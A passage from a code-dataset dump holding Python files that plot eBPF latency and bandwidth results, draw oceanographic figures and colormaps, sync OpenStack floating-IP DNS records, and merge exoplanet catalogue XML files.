njapke\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndf = pd.read_csv(\"latencies.csv\", index_col=\"Filters\")\n\nfig = plt.figure(figsize=(14,4))\nax = plt.axes(xlim=(1, 65534), ylim=(0, 6))\nax.grid(True)\n#ax.set_title('latency by filter (matched IP address)')\nax.set_title('latency by filter (no match)')\nax.set_xlabel('number of filters')\nax.set_ylabel('measured latency in ms')\n\nax.plot(np.array(df.index), np.array(df[\"Avg Latency\"]))\n\nfig.savefig(\"./latency.png\")\n\ndf_bnd = pd.read_csv(\"bandwidths.csv\", index_col=\"Filters\")\n\nfig = plt.figure(figsize=(14,4))\nax = plt.axes(xlim=(1, 65534), ylim=(0, 8))\nax.grid(True)\n#ax.set_title('bandwidth by filter (matched IP address)')\nax.set_title('bandwidth by filter (no match)')\nax.set_xlabel('number of filters')\nax.set_ylabel('measured bandwidth in Gbit/s')\n\nax.plot(np.array(df_bnd.index), np.array(df_bnd[\"Bitrate\"]))\n\nfig.savefig(\"./bandwidth.png\")\n\n","repo_name":"srnbckr/ebpf-network-emulation","sub_path":"baseline/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"68"} +{"seq_id":"73258430937","text":"\"\"\"\noctant.plotting - some plotting functions\n\nThe plotting module provides some specialized plotting\nfunctions ofen needed in ocean modelling.\n\nRequirements:\n=============\npylab, datetime, numpy, scipy\n\nFunctions:\n==========\n\nsticks - velocity vector stick plot along a time axis\ncmap_discretize - create a discrete colorbar from standard colormaps\n which can be applied to e.g. pcolor\nztodepth - change negative z-ax ticklabels to positive depths\nlayers - a function for plotting vertical transects based on layer heights\njetWoGn - colormap similar to jet, but without Green\n\n\"\"\"\n__docformat__ = \"restructuredtext en\"\n\nimport matplotlib.pyplot as plt\nfrom datetime import timedelta\nimport numpy as np\n#from scipy import interpolate\nfrom pylab import interp\nimport pylab as pl\n\ndef sticks(date,u,v,tnorm=0.1,figurewidth=8,pickind=1,color='blue'):\n \"\"\"\n sticks - create velocity stick plot\n\n sticks(date, u, v, tnorm=0.1, color='blue' \\\n figurewidth=8, pickind=1)\n\n date - list/array of datetime elements\n u - list/array of velocity in eastern direction\n v - list/array of velocity in northern direction\n tnorm - length of a u=max(u,v) as part of the time axis\n color - color of sticks\n figurewidth - width of the figure in inch\n pickind - plot every \"pickind\"-vector\n \"\"\"\n onedt=(date[-1]-date[0])\n onedt=timedelta(tnorm*onedt.days,tnorm*onedt.seconds)\n daynorm=onedt.days+onedt.seconds/86400.0\n\n u=np.asarray(u)\n v=np.asarray(v)\n norm=np.maximum(np.absolute(u).max(),np.absolute(v).max())\n\n t=[]\n f=[]\n mask=[]\n fac=pickind\n for i in range(int(len(date)/fac)):\n t.append(plt.date2num(date[i*fac]))\n f.append(0.0)\n mask.append(False)\n t.append(plt.date2num(date[i*fac] \\\n + timedelta(u[i*fac]/norm*onedt.days,u[i*fac]/norm*onedt.seconds)))\n f.append(v[i*fac]/norm*daynorm)\n mask.append(False)\n t.append(plt.date2num(date[i*fac]))\n f.append(0.0)\n mask.append(True)\n \n t=np.asarray(t)\n f=np.asarray(f)\n mask=np.asarray(mask)\n f=np.ma.masked_array(f,mask=mask)\n \n plt.figure(figsize=(figurewidth,tnorm*figurewidth))\n plt.plot_date(t,f,'-',color=color)\n ax=plt.gca()\n ax.set_aspect('equal')\n ax.set_xlim(t[0],t[-1])\n ax.set_ylim(-1.0*daynorm,1.0*daynorm)\n ax.set_frame_on(False)\n ax.yaxis.set_visible(False)\n\ndef cmap_discretize(cmap, N):\n \"\"\"Return a discrete colormap from the continuous colormap cmap.\n \n cmap: colormap instance, eg. cm.jet. \n N: Number of colors.\n \n Example\n x = resize(arange(100), (5,100))\n djet = cmap_discretize(cm.jet, 5)\n imshow(x, cmap=djet)\n \"\"\"\n\n cdict = cmap._segmentdata.copy()\n # N colors\n colors_i = np.linspace(0,1.,N)\n # N+1 indices\n indices = np.linspace(0,1.,N+1)\n for key in ('red','green','blue'):\n # Find the N colors\n D = np.array(cdict[key])\n #I = interpolate.interp1d(D[:,0], D[:,1])\n #I = interpolate.interp1d(D[:,0],D[:,1])\n colors = interp(colors_i,D[:,0],D[:,1])\n # Place these colors at the correct indices.\n A = np.zeros((N+1,3), float)\n A[:,0] = indices\n A[1:,1] = colors\n A[:-1,2] = colors\n # Create a tuple for the dictionary.\n L = []\n for l in A:\n L.append(tuple(l))\n cdict[key] = tuple(L)\n # Return colormap object.\n return plt.matplotlib.colors.LinearSegmentedColormap('colormap',cdict,1024)\n\ndef cmap_map(function,cmap):\n \"\"\" Applies function (which should operate on vectors of shape 3:\n [r, g, b], on colormap cmap. This routine will break any discontinuous\n points in a colormap.\n \"\"\"\n cdict = cmap._segmentdata\n step_dict = {}\n # Firt get the list of points where the segments start or end\n for key in ('red','green','blue'): step_dict[key] = map(lambda x: x[0], cdict[key])\n step_list = reduce(lambda x, y: x+y, step_dict.values())\n step_list = np.array(list(set(step_list)))\n # Then compute the LUT, and apply the function to the LUT\n reduced_cmap = lambda step : np.array(cmap(step)[0:3])\n old_LUT = np.array(map( reduced_cmap, step_list))\n new_LUT = np.array(map( function, old_LUT))\n # Now try to make a minimal segment definition of the new LUT\n cdict = {}\n for i,key in enumerate(('red','green','blue')):\n this_cdict = {}\n for j,step in enumerate(step_list):\n if step in step_dict[key]:\n this_cdict[step] = new_LUT[j,i]\n elif new_LUT[j,i]!=old_LUT[j,i]:\n this_cdict[step] = new_LUT[j,i]\n colorvector= map(lambda x: x + (x[1], ), this_cdict.items())\n colorvector.sort()\n cdict[key] = colorvector\n\n return pl.matplotlib.colors.LinearSegmentedColormap('colormap',cdict,1024)\n\ndef cmap_brightened(cmap,factor=0.5):\n \"\"\"\n Brightens colormap cmap with using a saturation factor 'factor'\n (0.5 by default).\n \"\"\"\n return cmap_map(lambda x: (1.-factor) + factor*x, cmap)\n\ndef layers(field,bath,h=None,xc=None,lines=None,missingbath=-10.0,fillvalue=-9999.0,lw=0.5,plotsurface=False,**kwargs):\n \"\"\"\n plot 2d field as layers with pcolor based on layer heights.\n (perfect for GETM results)\n \n usage: layers(2dfield[kmax,xmax],\n bath[xmax],\n h=h[kmax,xmax],\n xc=xc[xmax],\n missingbath=-10.0,\n fillvalue=-9999.0,\n lines=LineColor,\n lw=0.5,\n **kwargs)\n\n h,xc,missingbath,fillvalue,shading and lw are optional, default is sigma\n coordinates h=bath/kmax, default FillValue=-9999.0,\n default lw=0.05, and default xc is the vector of array indices.\n\n Polygons where bath == missingbath in any point are filled\n with fillvalue and are masked afterwards.\n The 2dfield can be preconfigured with (fillvalue)s where\n \"layers\" should not plot any value (e.g. if certain layers\n should be removed)\n \n Additional keyword arguments are passed to pcolor such as\n cmap=cm.hsv or shading='flat'.\n\n If lines is given, the layer interfaces are\n plotted as lines in color e.g. lines='black'\n \"\"\"\n \n (kmax,xmax)=field.shape\n \n if xc==None:\n xc=np.arange(xmax,dtype='f')\n \n dx2=0.5*(xc[1]-xc[0])\n xco=np.interp((np.arange(2*xmax+1)-1)/2.0,np.arange(xmax),xc,left=xc[0]-dx2,right=xc[-1]+dx2)\n bathd=np.interp(xco,xc,bath,left=bath[0],right=bath[-1])\n\n if h==None:\n h=np.asarray([bath/kmax for k in range(kmax)])\n \n zi=-bath+np.cumsum(np.vstack([np.zeros((1,xmax)),h]),axis=0);\n zd=np.zeros((kmax+1,2*xmax+1),dtype='f')\n fieldd=np.zeros((kmax+1,2*xmax+1),dtype='f')\n \n for k in range(kmax+1):\n for x in range(xmax):\n \n if k==kmax:\n kf=kmax-1\n else:\n kf=k\n\n if (x == 0):\n zd[k,0]=zi[k,x]\n zd[k,1]=zi[k,x]\n fieldd[k,0]=field[kf,x]\n fieldd[k,1]=field[kf,x]\n elif (bath[x]<=missingbath):\n zd[k,2*x+1]=fillvalue\n fieldd[k,2*x+1]=fillvalue\n fieldd[k,2*x]=fillvalue\n if (bath[x-1]<=missingbath):\n zd[k,2*x]=fillvalue\n else:\n zd[k,2*x]=zi[k,x-1]\n else:\n zd[k,2*x+1]=zi[k,x]\n fieldd[k,2*x+1]=field[kf,x]\n fieldd[k,2*x]=field[kf,x]\n if (bath[x-1]<=missingbath):\n zd[k,2*x]=zi[k,x]\n else:\n zd[k,2*x]=0.5*(zi[k,x-1]+zi[k,x])\n \n if x == xmax-1:\n zd[k,-1]=zi[k,x]\n fieldd[k,-1]=field[kf,x]\n\n fmasked=np.ma.masked_where(fieldd==fillvalue,fieldd)\n \n ret=pl.pcolor(xco,np.ma.array(zd,mask=fmasked.mask),fmasked,**kwargs)\n \n if lines!=None:\n if plotsurface:\n lastind=kmax+1\n else:\n lastind=kmax\n xi=np.array([xc for k in range(lastind)])\n bathi=np.array([bath for k in range(lastind)])\n plt.plot(xi.T,np.ma.masked_where(bathi.T<=-10.0,zi[:lastind,:].T), \\\n color=lines,lw=lw)\n plt.axis('tight')\n return ret\n\n\ndef ztodepth(ax=None,ylabelstr='depth [m]'):\n \"\"\"\n ztodepth - change negative z-ax ticklabels \n on the y-axis to positive depths\n\n usage: ztodepth(ax=gca(),\n ylabelstr='depth [m]')\n\n ztodepth gets the yticks and creates positive yticklabels\n for annotation in depth instead of position on z-axis.\n Its recommended to change yticks if needed before\n running ztodepth.\n\n If ylabelstr is not set to \"None\", then the y-axis gets\n the label \"depth [m]\" or other specified with ylabelstr.\n\n \"\"\"\n \n if ax is None:\n ax = plt.gca()\n \n yt = ax.get_yticks()\n dtl = [str(y*-1.0) for y in yt]\n ax.set_yticklabels(dtl)\n if ylabelstr != None:\n ax.set_ylabel(ylabelstr)\n\ndef drawscale(m,lon,lat,length,yoffset=None,fontsize=8.0,linewidth=0.5):\n \"\"\"draw a fancy map scale from lon-length/2,lat-yoffset to\n lon-length/2,lat-yoffset, label it with actual distance in km\n \n usage drawscale(m - mapping object,\n lon - lon value of center of scale\n lat - lat value of center of scale\n length - maximum length shown by scale in km\n yoffset - height of scale in \"km\"\n fontsize - fontsize of ticklabels\n linewidth - width of used lines)\n \n \"\"\"\n length = length*1000 #input length is km\n\n # idea for future: try to divide by 5, 4 and 3 to find\n # the best split factor and then create the x-coordinates\n\n #we need 5 sets of x coordinates (in map units)\n #center of scale\n xc,yc = m(lon,lat)\n #left edge of scale\n lon1,lat1 = m(xc-length/2,yc,inverse=True)\n x1,y1 = m(lon1,lat1)\n #quarter scale\n lon2,lat2 = m(xc-length/4,yc,inverse=True)\n x2,y2 = m(lon2,lat2)\n #three quarter scale\n lon3,lat3 = m(xc+length/4,yc,inverse=True)\n x3,y3 = m(lon3,lat3)\n #right edge of scale\n lon4,lat4 = m(xc+length/2,yc,inverse=True)\n x4,y4 = m(lon4,lat4)\n\n if yoffset is None:\n yoffset = 0.05*length\n else:\n yoffset = 1000.0*yoffset\n\n #plot top line\n ytop = yc+yoffset/2\n ybottom = yc-yoffset/2\n ytick = ybottom - yoffset/2\n ytext = ytick - yoffset/2\n m.plot([x1,x4],[ytop,ytop],color='k',lw=linewidth)\n #plot bottom line\n m.plot([x1,x4],[ybottom,ybottom],color='k',lw=linewidth)\n #plot left edge\n m.plot([x1,x1],[ybottom,ytop],color='k',lw=linewidth)\n #plot right edge\n m.plot([x4,x4],[ybottom,ytop],color='k',lw=linewidth)\n\n #make a filled black box from left edge to 1/4 way across\n plt.fill([x1,x2,x2,x1,x1],[ytop,ytop,ybottom,ybottom,ytop], \\\n 'k',lw=linewidth)\n #make a filled white box from 1/4 way across to 1/2 way across\n plt.fill([x2,xc,xc,x2,x2],[ytop,ytop,ybottom,ybottom,ytop], \\\n 'w',lw=linewidth)\n #make a filled white box from 1/2 way across to 3/4 way across\n plt.fill([xc,x3,x3,xc,xc],[ytop,ytop,ybottom,ybottom,ytop], \\\n 'k',lw=linewidth)\n #make a filled white box from 3/4 way across to end\n plt.fill([x3,x4,x4,x3,x3],[ytop,ytop,ybottom,ybottom,ytop], \\\n 'w',lw=linewidth)\n\n #plot 3 tick marks at left edge, center, and right edge\n m.plot([x1,x1],[ytick,ybottom],color='k',lw=linewidth)\n m.plot([xc,xc],[ytick,ybottom],color='k',lw=linewidth)\n m.plot([x4,x4],[ytick,ybottom],color='k',lw=linewidth)\n\n #label 3 tick marks\n plt.text(x1,ytext,'%d' % (0),\\\n horizontalalignment='center',\\\n verticalalignment='top',\\\n fontsize=fontsize)\n plt.text(xc,ytext,'%d' % (round((length/2)/1000)),\\\n horizontalalignment='center',\\\n verticalalignment='top',\\\n fontsize=fontsize)\n plt.text(x4,ytext,'%d' % (round((length)/1000)),\\\n horizontalalignment='center',\\\n verticalalignment='top',\\\n fontsize=fontsize)\n\n #put units on top\n plt.text(xc,ytop+yoffset/2,'km',\\\n horizontalalignment='center',\\\n verticalalignment='bottom',\\\n fontsize=fontsize)\n\ndef jetWoGn(reverse=False):\n \"\"\"\n jetWoGn(reverse=False)\n - returning a colormap similar to cm.jet, but without green.\n if reverse=True, the map starts with red instead of blue.\n \"\"\"\n m=18 # magic number, which works fine\n m0=pl.floor(m*0.0)\n m1=pl.floor(m*0.2)\n m2=pl.floor(m*0.2)\n m3=pl.floor(m/2)-m2-m1\n\n b_ = np.hstack( (0.4*np.arange(m1)/(m1-1.)+0.6, np.ones((m2+m3,)) ) )\n g_ = np.hstack( (np.zeros((m1,)),np.arange(m2)/(m2-1.),np.ones((m3,))) )\n r_ = np.hstack( (np.zeros((m1,)),np.zeros((m2,)),np.arange(m3)/(m3-1.)))\n\n r = np.hstack((r_,pl.flipud(b_)))\n g = np.hstack((g_,pl.flipud(g_)))\n b = np.hstack((b_,pl.flipud(r_)))\n\n if reverse:\n r = pl.flipud(r)\n g = pl.flipud(g)\n b = pl.flipud(b)\n\n ra = pl.linspace(0.0,1.0,m)\n\n cdict = {'red': zip(ra,r,r),\n 'green': zip(ra,g,g),\n 'blue': zip(ra,b,b)}\n\n return pl.matplotlib.colors.LinearSegmentedColormap('new_RdBl',cdict,256)\n\n","repo_name":"hetland/octant","sub_path":"octant/sandbox/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":14014,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"68"} +{"seq_id":"2145615722","text":"import os\nimport argparse\nimport ipaddress\nimport logging\nimport re\nimport time\nimport yaml\n\nimport mwopenstackclients\n\nlogger = logging.getLogger(__name__)\n\nPROJECT_ZONE_TEMPLATE = \"{project}.wmflabs.org.\"\nFQDN_TEMPLATE = \"instance-{server}.{project}.wmflabs.org.\"\nFQDN_REGEX = FQDN_TEMPLATE.replace(r\".\", r\"\\.\").format(\n server=\"(.*)\", project=\"{project}\"\n)\nMANAGED_DESCRIPTION = (\n \"MANAGED BY dns-floating-ip-updater.py IN PUPPET - DO NOT UPDATE OR DELETE\"\n)\n\n\ndef managed_description_error(action, type, label):\n logger.warning(\n \"Did not %s %s record for %s due to lack of managed_description!\",\n action,\n type,\n label,\n )\n\n\ndef update_tenant(\n client,\n tenant,\n project_main_zone_ids,\n public_addrs,\n existing_As,\n):\n logger.debug(\"Updating project %s\", tenant.name)\n if tenant.name == \"admin\":\n return\n\n server_addresses = {}\n nova_client = client.novaclient(tenant.name)\n # Go through every instance\n for server in nova_client.servers.list():\n for network_name, addresses in server.addresses.items():\n public = [\n str(ip[\"addr\"])\n for ip in addresses\n if ip[\"OS-EXT-IPS:type\"] == \"floating\"\n ]\n # If the instance has a public IP...\n if public:\n # Record their public IPs and generate their public name\n # according to FQDN_TEMPLATE. Technically there can be more\n # than one floating (and/or fixed) IP Although this is never\n # practically the case...\n server_addresses[server.name] = public\n A_FQDN = FQDN_TEMPLATE.format(\n server=server.name, project=tenant.name\n )\n public_addrs[A_FQDN, tenant.name] = True, public\n logger.debug(\"Found public IP %s -> %s\", public, A_FQDN)\n\n dns = mwopenstackclients.DnsManager(client, tenant=tenant.name)\n existing_match_regex = re.compile(FQDN_REGEX.format(project=tenant.name))\n # Now go through every zone the project controls\n for zone in dns.zones():\n logger.debug(\"Checking zone %s\", zone[\"name\"])\n # If this is their main zone, record the ID for later use\n if zone[\"name\"] == PROJECT_ZONE_TEMPLATE.format(project=tenant.name):\n project_main_zone_ids[tenant.name] = zone[\"id\"]\n\n # Go through every recordset in the zone\n for recordset in dns.recordsets(zone[\"id\"]):\n logger.debug(\n \"Found recordset %s %s\", recordset[\"name\"], recordset[\"type\"]\n )\n existing_As.append(recordset[\"name\"])\n # No IPv6 support in labs so no AAAAs\n if recordset[\"type\"] != \"A\":\n continue\n\n match = existing_match_regex.match(recordset[\"name\"])\n if match:\n # Matches instances for this project, managed by this script\n if match.group(1) in server_addresses and set(\n recordset[\"records\"]\n ) != set(server_addresses[match.group(1)]):\n # ... But instance has a different set of IPs. Update!\n if recordset[\"description\"] == MANAGED_DESCRIPTION:\n new_records = server_addresses[match.group(1)]\n logger.info(\n \"Updating type A record for %s\"\n \" - instance has different IPs - correct: %s\"\n \" vs. current: %s\",\n recordset[\"name\"],\n str(new_records),\n str(recordset[\"records\"]),\n )\n try:\n dns.update_recordset(\n zone[\"id\"],\n recordset[\"id\"],\n new_records,\n )\n except Exception:\n logger.exception(\n \"Failed to update %s\", recordset[\"name\"]\n )\n else:\n managed_description_error(\"update\", \"A\", recordset[\"name\"])\n elif match.group(1) not in server_addresses:\n # ... But instance does not actually exist. Delete!\n if recordset[\"description\"] == MANAGED_DESCRIPTION:\n logger.info(\n \"Deleting type A record for %s \"\n \" - instance does not exist\",\n recordset[\"name\"],\n )\n try:\n dns.delete_recordset(zone[\"id\"], recordset[\"id\"])\n except Exception:\n logger.exception(\n \"Failed to delete %s\", recordset[\"name\"]\n )\n else:\n managed_description_error(\"delete\", \"A\", recordset[\"name\"])\n elif \"*\" not in recordset[\"name\"]:\n # Recordset is not one of our FQDN_TEMPLATE ones, so just\n # store it so we can reflect its existence in PTR records\n # where appropriate.\n public_addrs[recordset[\"name\"], tenant.name] = (\n False,\n recordset[\"records\"],\n )\n\n\ndef try_update_tenant(\n client,\n tenant,\n project_main_zone_ids,\n public_addrs,\n existing_As,\n retries,\n retry_interval,\n):\n retry = 0\n while retry <= retries:\n try:\n update_tenant(\n client=client,\n tenant=tenant,\n project_main_zone_ids=project_main_zone_ids,\n public_addrs=public_addrs,\n existing_As=existing_As\n )\n return\n except Exception:\n retry += 1\n logger.exception(\n \"Failed to update tenant %s, retrying %s out of %s\"\n % (tenant.name, retry, retries)\n )\n if retry == retries:\n raise\n time.sleep(retry_interval)\n\n\ndef update(config, os_cloud, retries, retry_interval):\n floating_ip_ptr_fqdn_matching_regex = re.compile(\n config[\"floating_ip_ptr_fqdn_matching_regex\"]\n )\n\n client = mwopenstackclients.Clients(oscloud=os_cloud)\n\n project_main_zone_ids = {}\n public_addrs = {}\n existing_As = []\n # Go through every tenant\n for tenant in client.keystoneclient().projects.list():\n logger.info(\"Trying tenant %s\", tenant.name)\n try_update_tenant(\n client=client,\n tenant=tenant,\n project_main_zone_ids=project_main_zone_ids,\n public_addrs=public_addrs,\n existing_As=existing_As,\n retries=retries,\n retry_interval=retry_interval,\n )\n\n # Now we go through all the A record data we have stored\n public_PTRs = {}\n for (A_FQDN, project), (managed_here, IPs) in public_addrs.items():\n # Set up any that need to be and don't already exist\n if managed_here and A_FQDN not in existing_As:\n dns = mwopenstackclients.DnsManager(client, tenant=project)\n # Create instance-$instance.$project.wmflabs.org 120 IN A $IP\n # No IPv6 support in labs so no AAAAs\n logger.info(\"Creating A record for %s\", A_FQDN)\n if project in project_main_zone_ids:\n try:\n dns.create_recordset(\n project_main_zone_ids[project],\n A_FQDN,\n \"A\",\n IPs,\n description=MANAGED_DESCRIPTION,\n )\n except Exception:\n logger.exception(\"Failed to create %s\", A_FQDN)\n else:\n logger.warning(\"Oops! No main zone for project %s.\", project)\n\n # Generate PTR record data, handling rewriting for RFC 2317 delegation as\n # configured\n for IP in IPs:\n PTR_FQDN = ipaddress.ip_address(IP).reverse_pointer + \".\"\n delegated_PTR_FQDN = floating_ip_ptr_fqdn_matching_regex.sub(\n config[\"floating_ip_ptr_fqdn_replacement_pattern\"], PTR_FQDN\n )\n if delegated_PTR_FQDN.endswith(config[\"floating_ip_ptr_zone\"]):\n if delegated_PTR_FQDN in public_PTRs:\n public_PTRs[delegated_PTR_FQDN].append(A_FQDN)\n else:\n public_PTRs[delegated_PTR_FQDN] = [A_FQDN]\n else:\n logger.warning(\n \"Not handling %s\" + \" because it doesn't end with %s\",\n delegated_PTR_FQDN,\n config[\"floating_ip_ptr_zone\"],\n )\n\n # Clean up reverse proxies. We don't want to generate PTR records for dozens\n # or hundreds of hostnames that are sharing a single reverse proxy like\n # project-proxy handles. If any IP has more than 10 reverse mappings then we\n # will try to figure out a reasonable truncated list.\n proxies = (k for k in public_PTRs if len(public_PTRs[k]) > 10)\n proxy_fqdn_re = re.compile(\n FQDN_TEMPLATE.replace(r\".\", r\"\\.\").format(server=\"(.*)\", project=\"(.*)\")\n )\n for ptr in proxies:\n logger.info(\"Trimming FQDN list for %s\", ptr)\n # Usually there will be an FQDN_TEMPLATE host in there somewhere\n fqdns = [h for h in public_PTRs[ptr] if proxy_fqdn_re.match(h)]\n if not fqdns:\n # If for some reason there are no FQDN_TEMPLATE hosts take the whole\n # giant list, but sorted just for fun\n fqdns = sorted(public_PTRs[ptr])\n # Only use the first 10 no matter how many ended up being found\n public_PTRs[ptr] = fqdns[:10]\n logger.debug(\"Trimmed FQDN list for %s is %s\", ptr, public_PTRs[ptr])\n\n # Set up designate client to write recordsets with\n dns = mwopenstackclients.DnsManager(client, tenant=\"wmflabsdotorg\")\n # Find the correct zone ID for the floating IP zone\n floating_ip_ptr_zone_id = None\n for zone in dns.zones():\n if zone[\"name\"] == config[\"floating_ip_ptr_zone\"]:\n floating_ip_ptr_zone_id = zone[\"id\"]\n break\n\n # Zone should already exist!\n assert floating_ip_ptr_zone_id is not None\n\n existing_public_PTRs = {}\n # Go through each record in the delegated PTR zone, deleting any with our\n # managed_description that don't exist and updating any that don't match our\n # public_PTRs data.\n for recordset in dns.recordsets(floating_ip_ptr_zone_id):\n existing_public_PTRs[recordset[\"name\"]] = recordset\n if recordset[\"type\"] == \"PTR\":\n if recordset[\"name\"] not in public_PTRs:\n if recordset[\"description\"] == MANAGED_DESCRIPTION:\n # Delete whole recordset, it shouldn't exist anymore.\n logger.info(\"Deleting PTR record %s\", recordset[\"name\"])\n try:\n dns.delete_recordset(floating_ip_ptr_zone_id, recordset[\"id\"])\n except Exception:\n logger.exception(\"Failed to delete %s\", recordset[\"name\"])\n else:\n managed_description_error(\"delete\", \"PTR\", recordset[\"name\"])\n continue\n new_records = set(public_PTRs[recordset[\"name\"]])\n if new_records != set(recordset[\"records\"]):\n if recordset[\"description\"] == MANAGED_DESCRIPTION:\n # Update the recordset to have the correct IPs\n logger.info(\"Updating PTR record %s\", recordset[\"name\"])\n try:\n dns.update_recordset(\n floating_ip_ptr_zone_id,\n recordset[\"id\"],\n list(new_records),\n )\n except Exception:\n logger.exception(\"Failed to update %s\", recordset[\"name\"])\n else:\n managed_description_error(\"update\", \"PTR\", recordset[\"name\"])\n\n # Create PTRs in delegated PTR zone\n for delegated_PTR_FQDN, records in public_PTRs.items():\n # We already dealt with updating existing PTRs above.\n if delegated_PTR_FQDN not in existing_public_PTRs:\n logger.info(\n \"Creating PTR record %s pointing to %s\",\n delegated_PTR_FQDN,\n str(records),\n )\n try:\n dns.create_recordset(\n floating_ip_ptr_zone_id,\n delegated_PTR_FQDN,\n \"PTR\",\n records,\n description=MANAGED_DESCRIPTION,\n )\n except Exception:\n logger.exception(\"Failed to create %s\", delegated_PTR_FQDN)\n\n\ndef main():\n argparser = argparse.ArgumentParser(\n description=\"Update reverse DNS records for floating IPs\"\n )\n argparser.add_argument(\n \"-v\",\n \"--verbose\",\n action=\"count\",\n default=0,\n dest=\"loglevel\",\n help=(\n \"Increase logging verbosity, specify many times for more verbosity\"\n ),\n )\n argparser.add_argument(\n \"--config-file\",\n help=\"Path to config file\",\n default=\"/etc/wmcs-dns-floating-ip-updater.yaml\",\n type=argparse.FileType(\"r\"),\n )\n argparser.add_argument(\n \"--os-cloud\",\n help=\"clouds.yaml section to use for auth\",\n default=\"novaadmin\",\n )\n args = argparser.parse_args()\n\n logging.basicConfig(\n level=max(logging.DEBUG, logging.WARNING - (10 * args.loglevel)),\n format=\"%(asctime)s %(name)-12s %(levelname)-8s: %(message)s\",\n datefmt=\"%Y-%m-%dT%H:%M:%SZ\",\n )\n logging.captureWarnings(True)\n # Quiet some noisy 3rd-party loggers\n logging.getLogger(\"requests\").setLevel(logging.WARNING)\n logging.getLogger(\"urllib3\").setLevel(logging.WARNING)\n logging.getLogger(\"iso8601.iso8601\").setLevel(logging.WARNING)\n\n if os.getuid() != 0:\n logging.critical(\"root required\")\n exit(1)\n\n config = yaml.safe_load(args.config_file)\n retries = config.get(\"retries\", 2)\n retry_interval = config.get(\"retry_interval\", 120)\n\n retry = 0\n while retry <= retries:\n try:\n update(\n config,\n args.os_cloud,\n retries=retries,\n retry_interval=retry_interval,\n )\n exit(0)\n except Exception:\n retry += 1\n logger.exception(\n \"Failed to update, retrying %s out of %s\" % (retry, retries)\n )\n time.sleep(retry_interval)\n\n exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"wikimedia/operations-puppet","sub_path":"modules/openstack/files/designate/wmcs-dns-floating-ip-updater.py","file_name":"wmcs-dns-floating-ip-updater.py","file_ext":"py","file_size_in_byte":15010,"program_lang":"python","lang":"en","doc_type":"code","stars":244,"dataset":"github-code","pt":"68"} +{"seq_id":"22126510628","text":"#!/usr/bin/python\nimport time\nimport os\nimport glob\nimport shutil\nimport threading\n\nimport github\nimport mail\nimport xmltools\nimport multiprocessing\nimport eu\nimport nasa\nimport oec\nimport xml.etree.ElementTree as ET\n\nfrom github3 import login\n\n\nCURRENT = os.getcwd()\nDESTINATION = os.path.join(CURRENT, '_data/OEC/')\nCONFLICT = os.path.join(CURRENT, '_data/push/')\n\n\ndef file_name(dir):\n '''\n Return the directory with file name only\n :param dir: str\n :return: str\n '''\n return dir.split('/')[-1]\n\n\ndef has_attrib(ele,attr):\n return attr in ele.attrib\n\n\ndef compare_list_dir(other,oec):\n '''\n :param other: list of str\n :param oec: list of str\n :return: list of (list of str, dict)\n Return the new list of list, fist inner list in outer list stores the\n different filename exist and the second inner list will be same file name.\n '''\n\n dir_maping = {}\n # dir maping is dict stores that mapping the with same file names\n diff = []\n outer = [diff,dir_maping]\n\n # loop through director in other list\n for dir_other in other:\n marker = False\n for dir_oec in oec:\n # find the same file names\n if file_name(dir_other) == file_name(dir_oec):\n # mapping dir_other to dir_oec\n dir_maping[dir_other] = dir_oec\n marker = True\n # break out current loop\n break\n # files that are the same\n # did not find a match file name\n if marker is False:\n diff.append(dir_other)\n return outer\n\n#\n# other = ['a','b','c']\n# oec = ['a','e','t']\n# print(compare_list_dir(other,oec), flush=True)\n\ndef merge(Eother, Eoec, dirOther, dirOec, root, first, is_move):\n '''\n This is function deal with all compare cases\n :param Eother: Element tree\n :param Eoec: Element tree\n :return:\n '''\n # first use to control return once at root\n first += 1\n # loop through the child tag in Etree of other database\n for child in Eother:\n a = Eoec.getchildren()\n\n # get one element with given tag in current level\n childOEC = Eoec.find(child.tag) # DONT change this\n\n if childOEC != None: # find only check direct children\n if child.tag == 'star' or child.tag == 'planet':\n star_planet = Eoec.findall(child.tag)\n for element in star_planet:\n merge(child, element, dirOther, dirOec, root, first, is_move)\n # if child tag in third database is None then just skip\n elif child.text is None:\n continue\n # tag is name\n elif child.tag == 'name':\n all_names = Eoec.findall(child.tag)\n marker = False\n for oec_name in all_names:\n if oec_name.text == child.text:\n marker = True\n break\n # the name tag does not exist in OEC then append the name tag\n if marker == False:\n Eoec.append(child)\n # deal with errors\n elif 'errorplus' in child.attrib:\n # update with smaller error\n try:\n y = float(child.attrib['errorplus'])\n except:\n print(child.attrib['errorplus'], flush=True)\n print('Bad data in errorplus with directory name:' + str(dirOther), flush=True)\n break\n if not has_attrib(childOEC,'errorplus'):\n childOEC.text = child.text\n childOEC.set('errorplus', child.attrib['errorplus'])\n childOEC.set('errorminus', child.attrib['errorplus'])\n elif float(child.attrib['errorplus']) < float(childOEC.attrib['errorplus']):\n childOEC.text = child.text\n childOEC.set('errorplus', child.attrib['errorplus'])\n childOEC.set('errorminus', child.attrib['errorplus'])\n # never happen child.text is list at this point\n # if OEC tag is none then just update with third database info\n elif childOEC.text is None:\n childOEC.text = child.text\n # deal with numbers\n # elif (child.text).replace('.','',1).isdigit():\n # # if not equal then up to client's decision(move to confict area)\n # if child.text != childOEC.text:\n # move = True\n # # any other cases\n else:\n # the content is not the same then push file to (confict area)\n if child.text != childOEC.text:\n is_move = True\n # if is a distance tag\n merge(child,childOEC,dirOther,dirOec,root,first,is_move)\n # oec does not have such tag then update\n else:\n Eoec.append(child)\n # control only one return\n if(first == 0):\n # clear indentation in xml\n xmltools.indent(Eoec, level=0)\n # write to xml directory with all updates\n root.write(dirOec)\n\n # copy file\n if is_move == True:\n try:\n shutil.copy(dirOther, CONFLICT)\n except IOError:\n os.chmod(dirOther, 777) # ?? still can raise exception\n shutil.copy(dirOther, CONFLICT)\n\n return\n\n\ndef merge_two_database(list_third,list_oec):\n mainList = compare_list_dir(list_third ,list_oec)\n diffList = mainList[0]\n sameDict = mainList[1]\n # IF file name do not exist in OEC directory, then move to OEC dir\n for diff_dir in diffList:\n try:\n shutil.copy(diff_dir, DESTINATION)\n except (IOError):\n os.chmod(diff_dir, 777) # ?? still can raise exception\n shutil.copy(diff_dir, DESTINATION)\n # start merge 